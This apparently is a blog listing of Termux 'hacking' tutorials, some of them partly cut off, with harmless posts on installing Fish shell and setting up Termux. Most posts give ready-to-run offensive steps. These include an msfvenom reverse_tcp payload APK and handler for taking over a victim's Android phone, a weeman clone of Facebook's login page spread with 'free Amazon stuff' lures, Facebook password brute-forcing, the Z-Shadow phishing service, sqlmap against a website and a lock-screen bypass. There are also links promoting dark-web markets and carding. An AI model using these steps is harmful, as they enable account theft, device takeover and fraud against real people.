Posts

How to download, Install, Run and Use Fish-shell in Termux

Image
  Tutorial 1:  How We download, Install, Run and Use Fish-shell in Termux [ It Also work for non-rooted devices] What Will I Learn? How to download Fish-shell in Termux How to install Fish-shell in Termux How to run Fish-shell in Termux Today I build this Tutorial as a result of i believe there is a desire for this shell for the beginners in my future post on Termux. Thus I build this tutorial for the ability for you. Fish-shell & hacker's keyboard makes the utilization of Termux simple and that I hope you'll simply understand this tutorial and take advantage of  Fish-shell . What is Fish-shell? Fish(The Friendly Interactive Shell) a Unix (os) shell that focuses on interactive use, discover-ability and friendliness. Everything that may be done in different shell languages ought to be done in fish. It auto-complete the commands that area unit pretty cool. Fish is fully scrip-table, and its syntax is simple, clean and consistent. Fish is a fast, the auto-completion is surpris

How To Remove Pattern On Android Without Factory Reseting.

Image
 How To Remove Pattern On Android Without Factory Reseting.  Unlock Locked Pattern Without Losing Data! Requirements: Aroma File Manager +A memory card for device. +Your android device must be either locked by pattern lock or password lock. How To? 👇 1. After you download “Aroma File Manager” place it in your card [SD CARD] Insert card into your locked android device. 2. Open Stock Recovery Mode by rebooting your android device and pressing Power Key and Volume Up key simultaneously. Different phones may have different methods to open stock recovery mode, so if you face any problems comment and i will give you the solution. 3. After entering into recovery mode use volume+ and volume- buttons to scroll up and down.For select use power button or home button. 4. From there click on “Install zip from SD Card” and navigate to where you placed “Aroma File Manager” click and install it. 5. After installing, it will open in recovery mode. 6. From the “Aroma File Manager” navigate to settings&

MDORK IN TERMUX AND LINUX COMMANDS

Image
 ✳️ M-dork, Google Dorking with mdork  ✳️ What is MDork? mdork is a tool built with python to do dorking, then collects all the domains associated with the dork 🌀 Install and Usage 🌀 ✴️ Termux: pkg install python2 pip2 install mechanize pkg install git git clone https://github.com/Ranginang67/M-dork cd M-dork python2 mdork.py ✴️ Linux: apt-get install git apt-get install python apt-get install python-pip pip install mechanize git clone https://github.com/Ranginang67/M-dork cd M-dork python mdork.py IF U WANT ANY VIDEO RELATED IT COMMENT BELOW I WILL PROVIDE KEEP SUPPORT US  TO DO BETTER WORK

SQL MAP BY USING TERMUX

Image
SQL MAP Follow the Commands:  apt-get update apt-get upgrade pkg install perl pkg install python2 pkg install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 swlmap.py python2 sqlmap.py -u #website_link --dbs python2 sqlmap.py -u #website_link --dbs --columns IF U WANT ANY VIDEO RELATED IT COMMENT BELOW I WILL PROVIDE KEEP SUPPORT US  TO DO BETTER WORK

HACKING ANDROID USING METASPLOIT

Image
  Hacking Android Before doing this u have to install metasploit in u termux for that see this post  Here Open Termux  and type below commands  and see the Explanation too. ==================== msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable. Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim. So now we need to set up a handler to handle incoming connections to the port let’s do it. msfconsole use exploit/multi/handler set payload andr

INSTALL METASPLOIT ON TERMUX

Image
METASPLOIT To install Metasploit on Termux type below commands : apt-get install git git clone https://github.com/verluchie/termux-metasploit  cd termux-metasploit  chmod 777 install.sh  And Then Install it  sh install.sh  ==================== After installed run from your terminal msfconsole ====================  After this installation type msfconsole to run Metasploit           IF U WANT ANY VIDEO RELATED IT                  COMMENT BELOW I WILL PROVIDE     KEEP SUPPORT US TO DO BETTER WORK

PHISHING USING TERMUX

Image
PHISHING before u  have  do that u got to set up your termux with following commands apt update && upgrade -y apt install python2 git  clonehttps://github.com/samyoyo/weeman.git ls follow these commands: cd weeman python2 weeman.py set url https://m.facebook.com/login set action_url https://m.facebook.com/login set port 8080  run                     ==================   and short links.. for the google short links  and then send generated links.. by saying... get  amazon stuffs for free.... some fixes has been done watch on top of commands.... Github link https://github.com/evait-security/weeman ================================== IF U WANT ANY VIDEO RELATED IT COMMENT BELOW  I WILL PROVIDE KEEP SUPPORT US  TO DO BETTER WORK

SOCIAL HACKING USING TERMUX

Image
1.BRUTEFORCE U need to download facebook.py file from here : https://goo.gl/28p2sy And put it on internal Sdcard  And execute below commands :  ===================== apt-get update  apt-get upgrade  pkg install python2  pkg install python3 cd /sdcard/  cp facebook.py /$HOME cd chmod +x facebook.py python2 facebook.py  ======================= And after running facebook.py file  Type ID  and locate wordlist file for bruteforce attack.  It starts hacking  ==================================== 2.PHISHING Z-SHADOW HACKER: 1: visit your favorite browser in my case Chrome is my favorite. Then kind “Z Shadow” within the search bar or simply click here. Step 2: once you open the z-shadow.co simply click the sign in button. Step 3: currently fill out the Sign-Up type and click on the “Sign Up” button on the lowest of the shape. Step 4: once you with success produce associate account in z shadow then a page can open before you simply choose any service and duplicate any of the links. Step 5: when

SETUP COMMAND AFTER DOWNLOAD TERMUX

Image
TERMUX TUTORIAL GETTING STARTED WE HAVE TO SET UP  AT FIRST A TERMUX IN DOWNLOAD  Termux And type any commands bel ow   ============================= apt-get update apt-get upgrade pkg install git pkg install python pkg install python2 ============================= These area unit the desired commands initially you must do. ============== apt-get update This command updates the Termux ============= apt-get upgrade This Command upgrades the not upgraded files to a modern Version ============ pkg install git It install the git that's needed to transfer or clone github files =========== pkg install python and pkg install python2 It is the language that helps to execute many programs written in python language.this can be the should you must understand initially for all beginners IF U WANT ANY VIDEO RELATED IT COMMENT BELOW  I WILL PROVIDE KEEP SUPPORT US  TO DO BETTER WORK

Awesome Deep Web Links List

Image
 Awesome Deep Web Links List [Uncensored Table] Darknets within the Deep net, the house of assassins and pedophiles | WebImprints – knowledge Security Company The biggest Deep net links list out there (listed below). We took it one step additional by checking them out therefore we have a tendency to might categorize them, record the name of the positioning, provides a description of the site, record if it had been on-line or offline or dead, what they sell and that we even got screen shots. One of the toughest things concerning the Deep net is that it's nearly impossible to go looking for all the world as search engines don't work there, so you would like resources like this to search out what you're searching for. It is calculable that ninetieth of all web knowledge and websites area unit hidden from computer programme classification, this space of the web is thought because the Deep Web. Then there's another smaller sub-set of the Deep net that consists of darknet mar

Popular posts from this blog

How to download, Install, Run and Use Fish-shell in Termux

MDORK IN TERMUX AND LINUX COMMANDS

HOW TO DO CARDING